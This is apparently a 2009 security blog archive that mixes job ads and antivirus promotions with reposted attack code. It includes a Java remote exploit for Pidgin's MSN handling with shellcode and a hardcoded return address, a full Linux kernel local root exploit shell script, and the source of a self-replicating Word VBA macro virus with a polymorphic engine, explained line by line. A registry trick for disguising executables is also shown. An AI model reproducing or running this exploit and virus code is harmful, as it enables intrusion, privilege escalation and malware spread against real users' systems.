(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};

// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println("First packet sent, waiting for the ACK");

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");

}
});

messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});

}
}

// Original source milw0rm.com [2009-09-09]

Need more Computer and Internet security click here

Process Explorer v11.33

2009-09-27T23:04:00.004+07:00

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work. Download, click here

sources. technet.microsoft.com

Facebook Worm Koobface

2009-09-27T22:53:00.003+07:00

Koobface, the Facebook worm that takes over computers by spreading through the social network, is back in a new form. The newly tweaked Facebook worm works like its predecessor, only with an updated look and code that might not be caught as quickly.
Facebook Worm 2.0

Koobface tricks you into following a link that looks like it’s from a friend. It’ll usually look like a link to a video of someone you know. Once you open the link, though, you’ll be told you need to download an update to your video player. That update is actually the Facebook worm threat in disguise.

The new variant, discovered by researchers at Trend Micro, poses as a YouTube page. It’ll even display your name and photo from Facebook to give a nonthreatening appearance to unsuspecting users.

Facebook-Aided Virus Spread

Once you agree to install the software it offers, the Koobface worm will take over your computer and hijack your Facebook account. It’ll then live up to its Facebook virus reputation by sending messages to your friends and attempting to infect them.

“It also sends and receives information from an infected machine by connecting to several servers,” says Trend Micro’s Rik Ferguson. “This allows hackers to execute commands on the affected machine.”

The new Koobface virus has also been detected on several other social networks, including MySpace, Bebo, Friendster, Hi5, and Live Journal.
Koobface Protection

Keeping yourself safe from Koobface is simple: Be very cautious of what you click. Even if something appears to have come from a friend, remember that their account could be infected and the message may not actually be from them. Make sure you know where you’re going before you click.

Once you do follow a link, never install software updates directly from that page. If you receive a notice that you need an update for your Adobe Flash player, navigate directly to adobe.com and look for the update at the original source. That’s the safest way to know you’re getting the real deal, and not a Facebook worm in disguise.

source facebook-worm-koobface/

Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC

2009-09-27T22:46:00.002+07:00

FIXES
Notepad++ v5.4.5 fixed bugs (from v5.4.4)
1. Fix plugins shortcuts not working bug.
2. Fix the tooltip on toolbar display bug for the plugins icons.
3. Fix a crash that was occurring when searching in files from a deep path.
4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).
6. Add SQL folding capacity.

source milw0rm.com

download source code, click here

Free Antivirus Computer Security

2009-07-25T23:41:00.002+07:00

PCMAV Valkyrie Antivirus, PCMAV 2.0c Download
PCMAV Valkyrie Antivirus, PCMAV 2.0b Download
Remover Sality antivirus, download

For another antivirus solution, click here

Senior Services Sales Vacancy

2009-07-25T23:31:00.003+07:00

STOP TALKING, START DOING!
IBM has always delivered technology innovation to our customers. Now, we partner with them in their business and help them become special company, and to stay special. To make our customers special, we need people who are above the ordinary.
IBM Indonesia recruits best-in-class professionals to deliver best breed of IT Solutions and Services to customers.
Do you have the confidence? Do you have the enthusiasm? Do you have the insights to partner with customers and deliver solutions and have significant positive impact on their business?

SENIOR SERVICES SALES – FINANCIAL SECTOR

(POSITION CODE: GTS-0240897)

Responsibilities:

* Facilitate effort for opportunity identification, applies sales skills to engage and close opportunities with key decision makers.
* Responsible for sales results for the selected solution with the assigned territory.
* Understand competition and develops appropriate sales strategy.
* Maintains deep technical skills of IBM products and working knowledge of other services product portfolio, as well as basic understanding of Infrastructure Solution.
Desired Candidate:

* Minimum of Bachelor Degree from any background.
* Experience in I/T industry in Sales / Account Manager for minimum 5 years.
* Working experience in handling financial sector.
* High drive towards achievement.
* Proficient level for English and Bahasa Indonesia, both written and spoken.

Submit your application through ibm.com/employment/id, at the latest by August 15th, 2009. Search for the position code and apply through IBM career portal.

Only short listed candidates will be contacted.

source. jobsdb.com

Professional Sales Executive for IT Products Vacancy

2009-05-23T22:07:00.003+07:00

PT InMarc Indonesia is a fast Growing Marketing Agency. We have strong fundamental business in Indonesian Major IT Industries supporting worldwide brand such as Microsoft, Dell and Hewlett Packard. We are looking for the following candidates for our expansion:
Professional Sales Executive for IT Products (SALES)

Available Position: 10
Work location: Jakarta
Level of education: Min. D3 in Any Major
Work experience: 2 Years, Fresh Graduates are encouraged to Apply but commitment is required.
Gender: Male / Female
Marital Status: Single
Age: 23 – 30 years old

General Requirements:

* Living in West or North of Jakarta
* At least 2 years of experience, Fresh Graduates are encouraged to Apply but commitment is required.
* Computer Literate is a must
* Attractive, sociable and Mature
* Pleasant personality with good communication skill
* Highly creative, self motivated, strong-drive, good analytical, hard worker and should be able to work under pressure to meet deadline or target
* Target Oriented & good team work.
* Have own vehicle (for Sales)

Please send your application letter with detailed resume/CV, stating details of qualifications and summary of experiences, present/ expected salary, and other documents support, current photograph not later than 30 May 2009 after this advertisement to:

PT InMarc Indonesia
Muara Karang Blok M9 Selatan No.71-72
Jakarta 14450
Hrd.inmarc@gmail.com

Or you can check our website on:
www.marathonrewards.com; www.hp-runner.com; www.wm-runner.com

We are sorry to inform that only short listed candidates will be notified.

Coppermine Photo Gallery 1.4.22 Remote Exploit

2009-05-23T21:51:00.002+07:00

Need register_globals = on and magic_quotes_gpc = off
Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713
Coppermine Photo Gallery 1.4.22 Remote Exploit

Coded by girex

source. milw0rm

download

Need computer and internet security, click here

Eset Nod32 Antivirus

2009-05-12T10:32:00.002+07:00

Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance & smallest footprint. NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.

ESET solutions are built on ESET’s one-of-a-kind ThreatSense technology. This advanced heuristics engine enables proactive detection of malware not covered by even the most frequently updated signature-based products by decoding and analyzing executable code in real time, using an emulated environment. By allowing malware to execute in a secure virtual world, ESET is able to clearly differentiate between benign files and even the most sophisticated and cleverly-disguised malware.
Users of Microsoft® Windows® can experience the power and elegance of NOD32’s ThreatSense Technology with ease and comfort. Our single optimized engine offers the best protection from viruses, spyware, adware, phishing attacks, and more. Keep tomorrow’s threats at bay with our proactive detection technology.
learn more...

For another solution, click here

XSS (Cross Site Scripting) Cheat Sheet

2009-05-12T10:12:00.003+07:00

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum

source. RSnake

Download Cheat Sheet, click here

hacker safe

Linux kernel local root exploit information

2009-04-12T14:20:00.003+07:00

#!/bin/sh

# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################

hacker safe

SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include
#include

int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include
#include
#include
#include
#include

int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}

int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]
hacker safe

Eliminate the Lable Google Malware Badware

2009-04-06T21:19:00.002+07:00

There are some the matters require to in knowing:
Malware ( abbreviation of term English Ianguage ) malicious software, meaning the compromising software) is the computer program created for the purpose of and specific-purpose of his creator and is the program look for weakness from software. Generally malware created to leak or destroy a software or system operasi.(Wiki).

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)

Google as search engine biggest in world wish to give the result search the cleanness and peaceful to searcher that good from side website and seo, special so for the things from side website, google besides doing crawl he/she also do scanning to website do website the contain script which including category malware/badware or don't.

In the activity google work along with stopbadware.org to give the information to:
Administrator(Suspect website) usually google will deliver the enamel to:

buse@website com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *

so that you require to make one of the above enamel for precaution to catch the information in delivering by google, if website you is hit Label Malware.
They also inform to public society ( consumer Google Search), that website the contain Malware, by presenting be like this

Cause:
One of [the] process entry of malware/badware into website you can in causing by existence of virus in your computer, moment update website ( upload file php or html) that good through FTP or Browser hence virus will injection some script malware/badware into page website without you realize before all, so that when google do scanning and find script malware/badware is in website you is hence google will direct give Label Badware/Malware in SERP their.
They also inform to public society ( consumer Google Search), that website the contain Malware.

Way to overcome:

To overcome / to eliminate Label Badware/Malware in SERP Google, hence you require to do some matters is :
1. Do the sweeping script malware/badware [at] script website your
2. Ask review on the side of stopbadware.org
3. Ask review side Google

Special to poin which to 3. that is requesting review side of Google, its way is

1. You have to have account in google, can in the form of enamel in google.

2. Step into http://google.com/accounts select;choose Webmaster / Webmaster Tools
3. If the menu not shown was hence you had to enlist in google webmaster tools formerly.
4. Register website you is in google webmaster tools then do the verification / verify
5. After that verify please enter the menu Overview and click link Review site

Awaited 2 x 24 Jam, [stopbadware.org will review your website and if website you truely have clear of malware/badware hence they will contact google, then Google will do review directly.

After they express website you really clean hence Label Badware/Malware in SERP Google will soon in eliminating, usually process the abolition Label this eat the time of 1x24 [hour/clock]... patient thus yes.... :)

AVG Internet Security 8.5

2009-03-23T10:24:00.003+07:00

Comprehensive real-time protection against viruses, spyware, identity theft, poisoned web pages, and all types of malware that can threaten your valuable personal information. Prevention is better than cure! Comprehensive cyberthreat prevention for Windows-based home users from one of the World's most trusted security companies.

Features :

All-in-one protection
Antivirus and Anti-Spyware: protection against viruses, worms, spyware, and trojans
Identity Protection: helps prevent identity theft
Anti-Rootkit: protection against hidden threats (rootkits)
Web Shield: screens downloads and IM for infections
LinkScanner: blocks poisoned web pages in real time
Anti-Spam with anti-phishing: filters out unwanted and fraudulent e-mails
Firewall: blocks hacker attacks
System Tools: tailor AVG for your particular needs
Easy-to-use, automated protection

AVG Internet Security gives you maximum protection with real-time scanning, automatic updates, low-impact background scanning for online threats, and instant quarantining or removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is analyzed to ensure nothing can get onto your system without your knowledge.

AVG checks in real time:
All files including documents, photos, music, and applications
E-mails (all major email programs like Microsoft Outlook and Thunderbird supported)
Instant messaging and P2P communications
File downloads and online transactions such as shopping and banking
Search results and any other web links you click on
Internet Security – prevention is better than cure

AVG Internet Security provides multiple layers of protection to ensure nothing slips through.
NEW Identity Theft Protection prevents new and unknown threats from stealing your personal information like bank and credit card details.
LinkScanner checks every link, making sure you're safe searching the internet and surfing the web, minimizing the risk of you accidentally visiting a poisoned web page.
Web Shield detects and blocks malware threats in file downloads and instant-messaging conversations.
The Firewall stops hackers from accessing and misusing your computer.
Antivirus, Anti-Spyware, and Anti-Rootkit detect and root out all manner of malicious software, no matter how stealthy it may be.

You didn't buy your computer to worry about security. So let AVG Internet Security do the worrying for you while you get on with your online life.
Tailor AVG just for you

AVG's System Tools let you easily configure your privacy settings, connections, and browser plug-ins all in one place.
The best Windows protection - trusted by millions of users

AVG's award-winning antivirus technology protects more than 80 million users and is certified by major antivirus testing organizations (VB100%, ICSA, West Coast Labs Checkmark). View all AVG awards & certifications
No hidden costs

When you purchase an AVG product, everything you need is included in the price for the full license duration - technical support, virus updates, and new program versions. All users of paid AVG products also qualify for generous discounts on subscription renewals and product upgrades.
Flexible licensing
AVG Internet Security can be purchased online in license packs for 1-10 computers.
One or two year subscriptions available. More info, click here

Make New Extension Executable File

2009-03-23T09:56:00.001+07:00

Such as we know windows only recognizing some file type fruits executable newly, that is the file exe, com, scr, and pif. How if we will make extension file executable newly, for example extension ext( for example his file name : Anti. ext and nature of his file be like file Anti.exe). Usefulness of this technique is so that black out the program to file exe, scr, and com can be overcome. So that if file exe be like msconfig.exe blacked out because extension exe, hence we fixed can run the program msconfig the by changing extension, for example becoming msconfig.ext

To make the matter be like this easy very, we are only require to enter key newly into registry, for example extension ext which be like file exe, hence file reg yg enterred is :

Windows Registry Editor Version 5.00
[ HKEY_CLASSES_ROOT\.EVA]
@=" exefile"

Become his format is :
Windows Registry Editor Version 5.00
[ HKEY_CLASSES_ROOT\.EKSTENSIBARU]
@=" exefile" to be like file exe
@=" scrfile" to be like file scr

Is while to be like file com, hence have to be entered also in file regi key PersistentHandler This technique can is also used by virus to system his defence in computer, that is with :

. 1. Change handling of file dangerous, for example binding file jpg exefile, whereas virus file fixed fasten ( join forces) file jpg in fact, without changing extension file, is while substitution extension for file draw jpg is extension will different, for example tmp

. 2. Incognito to become the file which similar with file undangerous so that difficult detected for example virus for file extension d11 at first sight look like with dll ekstensi etc.

Note :

To alter, for example file scr before all use the program wafting icon alone, we wish the file scr use the icon from outside, for example property windows without compiling again file scr, hence we require to changing value registry, at key :

[ HKEY_CLASSES_ROOT\SCRFILE]
that is in :
Value DefaultIcon from % 1 becoming, for example :: % Systemroot%\System32\Shell32.Dll,-154

Anti Keylogger

2009-02-02T20:31:00.000+07:00

The threat: Keyloggers as means of stealing information.

Information stealing exists since early days of the World Wide Web. Unfortunately, various kinds of white-collar crime aimed at stealing valuable (in the direct sense) information thrive in cyberspace. The scale of these crimes varies from harvesting email addresses for spammers to identity theft and espionage.

Since the Internet has become a part of daily life and business, rapid growth of cybercrime endangers the whole society. Information-stealing software certainly facilitate these crimes, sometimes being the only instrument a thief needs to commit them.

Real protection starts with identifying the threat.

One of the most effective ways of stealing information is capturing keystrokes. A small, fairly simple program (a programmer can write a plain one in a couple of days) captures everything the user is doing - keystrokes, mouse clicks, files opened and closed, sites visited. A little more sophisticated programs of this kind also capture text from windows and make screenshots (record everything displayed on the screen) - so the information is captured even if the user doesn't type anything, just opens the views the file. These programs are called Keylogging Programs (keyloggers, key loggers, keystroke loggers, key recorders, key trappers, key capture programs, etc.) They form the most dangerous core of so-called spyware.

Old keyloggers become obsolete. New keyloggers appear all the time. Existing keylogging programs are constantly modernized. It is extremely likely that several keyloggers are being written at this very moment.

Means of defense: Anti-spyware, anti-viruses and personal firewalls

Experts recommend to use a combination of three products: a personal firewall, an anti-virus and an anti-spyware - and regularly update the latter two. However, even in this case a computer won't be 100% secure against keyloggers. Why?

Most anti-spy and anti-virus products, whatever their names are and whatever their advertising says, apply the same scheme - pattern matching. These programs scan the system, looking for code that matches signatures - pieces of spyware code, which are kept in so-called signature bases. These products can protect from spyware which has already been detected and studied before. This approach makes anti-spyware developers inevitably lag behind spyware writers. Without frequent updating anti-spy products lose their efficiency very quickly. It can become very risky because the PC owner still relies on his anti-spy or anti-virus.

Unfortunately, no signature base is complete enough to guarantee total protection. Even if the base is updated regularly, if this spyware signature is not included there - the anti-spy software is helpless against it. Anti-spies do not recognize every spyware product, when it is brand-new, for some time - until its signature is included into the bases and users update their anti-spies. There also are kinds of spy software which signatures are unlikely to be included into any signature base. For example, spy software can be developed by government organizations for their own purposes. Some commercial, especially corporate, monitoring products are very rarely included into signature bases, though many of them can well be used for spying as well.

Another case - when there is only one copy of spy program. It doesn't take too long for a good programmer to write one. Spyware, just like clothes, can be "tailor-made". Hackers often take source codes of spy software from the Internet change them a bit and then compile something new, which no signature base will recognize.

When a keylogging module is the part of a virus, it can cause lots of trouble, because several hours or even days will pass until it is included into signature bases.

A problem with a personal firewall is that it asks too many questions. Even an experienced user can answer them incorrectly and allow some information-stealing program or module do its job. For example, some commercial monitoring programs use processes of programs with access to the Internet (browsers, mail clients, etc.) As a result, if the anti-virus overlooks a keylogger, valuable information can be stolen and sent via the Internet to the address specified by the hacker (or some other person).

Anti-keylogger™ is a dedicated anti-keylogging product. Unlike most other anti-spyware, Anti-keylogger doesn't depend on signature bases - just because it doesn't use them. The newly developed solutions and algorithms allow it to spot behavior of a spy program - and disable it instantly.

Anti-keylogger™ can protect against even "custom-made" software keyloggers, which are extremely dangerous - and very popular with cybercriminals.

Anti-keylogger™ is very user-friendly. It runs at the background, quite transparently for the user. It won't ask you needless questions; nor it will distract you from your work.

Easy-to-use and reliable, Anti-keylogger™will guard your privacy and guarantee that all your confidential information remains secret.

For more information detail, click here

The polymorphic engine for VBA

2009-02-02T20:22:00.001+07:00

This engine is a combination of both a class infector and a polymorphic engine. The whole thing is called 'bliem' like the virus I first used this engine in. Let's say something about the technic...

The most bad thing about the already existing polymorphic engines for vba was that the always inserted the code at the same lines or the volume of the source code growed and growed and ... So 'bliem' doesn't have such problems. The main good thing in 'bliem' is that it always 'keeps an eye' on the actually size of the source code and reduces it when it's too big. Let's say something about the technic of inserting the junkcode: The junkcode is inserted into the viruscode not in the common way. The junkcode is inserted while infection. This means that the whole viruscode is stored in arrays and the junkcode is stored in some of this arrays. Like the main code is stored there, also junkcode is also there and will be inserted while infecting the
new class object. While inserting the actual code into arrays, the 'bliem brain' is checking for the actually size of itself and if its too big, it deletes some junk arrays. I use this method because the old one with the command '.deletelines' only screwed up the code.

To make 'bliem' work you have to insert a comment sign ( ' ) in the end of every code line. 'bliem' uses this for finding the junkcode in the normal virus code. Without this signs the virus and the polymorphic engine won't work.

So 'bliem' is infector and polymorphic engine in one, so don't wonder about the code. If you have any questions or whatever, feel free and mail me!

!This is only the distribution code. Original code uses shorter variable names!

Private Sub document_open() '
Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '
Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '
Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '
Set newhost = skip.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vcode = "Private Sub document_close()" & this & vx & vbCr '
If MacroContainer = NormalTemplate Then '
Set skip = ActiveDocument '
Set newhost = skip.VBProject.VBComponents(1).CodeModule '
vcode = "Sub document_open()" & this & vx & vbCr '
End If: Randomize: lines_ = host.countoflines '
For i = 2 To lines_ '
junkcode = "" '
dis = Int(Rnd * 3) '
pos = InStr(host.Lines(i, 1), this) '
If pos = 0 Then GoTo end_ '
If pos = 2 And lines_ > 100 Then '
virus(i) = "": dis = 1: GoTo next_ '
End If '
virus(i) = Left(host.Lines(i, 1), (pos - 1)) '
For j = 1 To Int(75 - (Rnd * 20)) '
junkcode = junkcode & Chr(255 - Int(Rnd * 100)) '
Next j '
virus(i) = virus(i) & this & junkcode '
If dis = 2 Then virus(i) = virus(i) & vbCr & Chr(32) & this & junkcode '
vcode = vcode & virus(i) & vbCr '
next_: '
Next i '
end_: '
If newhost.countoflines < 2 Then '
newhost.AddFromString vcode '
skip.Save '
End If '
End Sub '
If Day(Now()) = 31 Then msbox virus(1) '
Rem Another virus by Jack Twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by Jack Twoflower '

I'll walk now through the code...

> Attention. The whole engine needs this " ' " signs after every
> line of code.

Private Sub document_open() '
Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '

> Dim the arrays. We need about 150 coz in this array the whole virus
> code will be stored. Turn off Virusprotection...

Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '
Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '

> Set here our current host

For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '

> Create junk code for the engine

vcode = "Private Sub document_close()" & this & vx & vbCr '

> This will be our first line of code...

If MacroContainer = NormalTemplate Then '
Set skip = ActiveDocument '
vcode = "Sub document_open()" & this & vx & vbCr '
End If: Randomize: lines_ = host.countoflines '

> If we are here in the Normaltemplate then exchange the hosts.

Set newhost = skip.VBProject.VBComponents(1).CodeModule '

> Set the new host

For i = 2 To lines_ '

> Here the 'brain' of the engine starts...

junkcode = "" '

> Clear the variable every loop

dis = Int(Rnd * 3) '

> Generate a random number for the engine

pos = InStr(host.Lines(i, 1), this) '

> Get the position of the " ' " character in every line...

If pos = 0 Then GoTo end_ '

> If there is no such sign goto end...

If pos = 2 And lines_ > 100 Then '

> The following code gets active if the size of the whole
> code is growing too big...it cuts the junkcode line out
> of the normal code...

virus(i) = "": dis = 1: GoTo next_ '

> Clear this variable and goto next loop

End If '
virus(i) = Left(host.Lines(i, 1), (pos - 1)) '

> If the size is not too big, copy the normal code without
> the junkcode into the arrays...

For j = 1 To Int(75 - (Rnd * 20)) '
junkcode = junkcode & Chr(255 - Int(Rnd * 100)) '
Next j '

> Generate junkcode again...

virus(i) = virus(i) & this & junkcode '

> Add the junkcode...

If dis = 2 Then virus(i) = virus(i) & vbCr & Chr(32) & this & junkcode '

> If the 'dis' integer is 2 then add some junkcode lines into our code...

vcode = vcode & virus(i) & vbCr '

> Add the whole code into 'vcode'

next_: '
Next i '

> Play it again Sam!

end_: '
If newhost.countoflines < 2 Then '

> If there are 0 or 1 line in our newhost...

newhost.AddFromString vcode '

> infect it...

skip.Save '

> and save it...

End If '
If Day(Now()) = 31 Then msbox virus(1) '

> little payload...

End Sub '
Rem Another virus by jack twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by jack twoflower '

ref. VX Heavens

Acunetix Web Vulnerability Scanner

2009-01-26T10:48:00.003+07:00

Why You Need To Secure Your Web Applications
Website security is possibly today's most overlooked aspect of securing the
enterprise and should be a priority in any organization.
Increasingly, hackers are concentrating their efforts on web-based
applications – shopping carts, forms, login pages, dynamic content, etc.
Accessible 24/7 from anywhere in the world, insecure web applications
provide easy access to backend corporate databases and also allow hackers
to perform illegal activities using the attacked sites. A victim’s website can be
used to launch criminal activities such as hosting phishing sites or to transfer
illicit content, while abusing the website’s bandwidth and making its owner
liable for these unlawful acts.
Hackers already have a wide repertoire of attacks that they regularly launch
against organizations including SQL Injection, Cross Site Scripting, Directory
Traversal Attacks, Parameter Manipulation (e.g., URL, Cookie, HTTP
headers, HTML Forms), Authentication Attacks, Directory Enumeration and
other exploits. Moreover, the hacker community is very close-knit; newly
discovered web application intrusions are posted on a number of forums and
websites known only to members of that exclusive group. Postings are
updated daily and are used to propagate and facilitate further hacking.
Web applications – shopping carts, forms, login pages, dynamic content, and
other bespoke applications – are designed to allow your website visitors to
retrieve and submit dynamic content including varying levels of personal and
sensitive data.
If these web applications are not secure, then your entire database of
sensitive information is at serious risk. A Gartner Group study reveals that
75% of cyber attacks are done at the web application level.
Download Acunetix Web Vulnerability
Scanner manual, click here

Why does this happen?

